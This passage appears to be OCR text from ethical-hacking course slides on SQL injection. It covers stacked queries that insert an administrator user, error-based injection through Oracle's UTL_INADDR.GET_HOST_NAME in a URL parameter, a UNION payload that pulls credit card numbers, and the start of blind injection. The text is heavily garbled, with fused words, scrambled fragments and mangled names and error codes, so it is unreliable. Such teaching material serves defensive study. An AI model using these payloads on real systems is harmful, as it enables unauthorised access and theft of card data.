query givesthe attacker
administratorprivileges
INSERT INTO Users (UserName,isAdmin, Password)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Forexample, SQLqueryis as follows
the original
SELECT *
FROM EMP WHEREEMP.EID = 1001 AND EMP.ENAME = ‘Bob’
Now,the attacker
query as follows:concatenates
(;)the delimiter andthe malicious
queryto theoriginal
ical andCountermensores
Mackin ©by E-Comel
Copyright
ErrorBasedSQL
Injection
ror based
‘This
forces
Sa Injection thedatabase
explotatonmaydiferdepending
to perform
onthe DBMS
in
some operationwhichtherepli
Thematisous
request
would
bef Ore 08: TEMS. nose oore untnoen
ErrorBasedSQL Injection
Let us understandthedetailsoferror-based SQLinjection. As discussed earlier,i n error-based
SQLinjection,the attackerforcesthe databaseto return error messages i n response to his/her
inputs.Later,the attackermay analyze the error messages obtainedfromthe underlying
databaseto gather informationthat can be usedfor constructing the maliciousquery. The
attackerusesthis typeof SQLinjection technique whenhe/she is unable to exploitany other
SQLinjectiontechniques directly.
The primarygoalof this technique is to generate the error
message fromthe database, whichcan be usedto perform a successful SQLinjection attack.
Such exploitation
maydifferfromone DBMSto another.
Consider
SELECT
the
* SQL
following
query:
product=$id_product
FROM productsWHEREid
Consider
the request that executesthe query above:
to a script
The
malicious
request .
http://wwwexample.com/product
php?id=10
Oracle
wouldbe(e-g., 10g):
http://www
.
example.com/product
php?
id=10| |UTL_INADDR.GET_HOST_NAME(
(SELECTuser FROMDUAL) )—
In example,
theaforementioned the tester concatenatesthe value10 with the resultof the
functionUTL_INADDR.GET_HOST_NAME. ThisOraclefunctionwill try to return the hostname
passed
of the parameter to it, whichis anotherquery,i.e., the name of the user. Whenthe
databaselooksfor a hostnamewith the user databasename, it will fall and return an error
messagesuchas
ORA-292257: host SCOTT unknown
Then,
the tester can manipulate passed
the parameter to the GET_HOST_NAME()
functionand
‘the
result
will
beshowni n theerror
message.
Module5 Page2020 ical andCountermensores
Mackin
©
Copyright
by E-Comel
Union SQL
Injection
1GThistechique
involves
query
ein
exginal
the
a forged tothe query
ofof
|G T he result
ofa forgedquery willbe
joinedto resultoftheorginal query,thereby allowing
obtain thevalves fils
Into othera bles
ical andCountermensores
Mackin ©by E-Comel
Copyright
Satinecton|
For
example,
SELECT Name, Phone,Address FROM Users WHERE Ii
setfollowing
Now, the Idvalue:
$id=1 UNION ALL SELECT creditCardNumber,1,1FROM CreditCardTable
attacker
‘The now launchesa UNIONSQL queryasfollows:
injection
SELECT Name, Phone,Address FROM Users WHERE Id=1 UNION ALL SELECT
creditcardNumber,1,1FROM CreditCardTable
Theabovequeryjoinstheresultof the original
querywith allthecreditcardusers.
Module5 2022
Page tical andCountermensores
Making Copyright©
by Comet
Blind/Inferential SQL
Injection
but
the
results an
{©BlindSatInjection whena webapplication
is used
ofthe injection
ae no visible
t othe
is vulnerable
attacker
to SAL injection,
Generic
SAL SAL
Blind injectionis identical
age is splayed
to # normal Injection,except
whenan attacker
that a genericcustom
an application
to exploit ratherthan
useful
eeror
attempts
Page Seeing3 message
anew
Thistypeofatackcanbecome ime-intensive because
craftedforeachbitrecovered
statement must
to
for the attacker perform
suchan application
injection
an SQL attack.Nevertheless,
injection itis not impossible
with an SQLinjectionattack.Blind injectiondiffersfrom normalSQL
i n the manner of retrieving
to exploit
ical and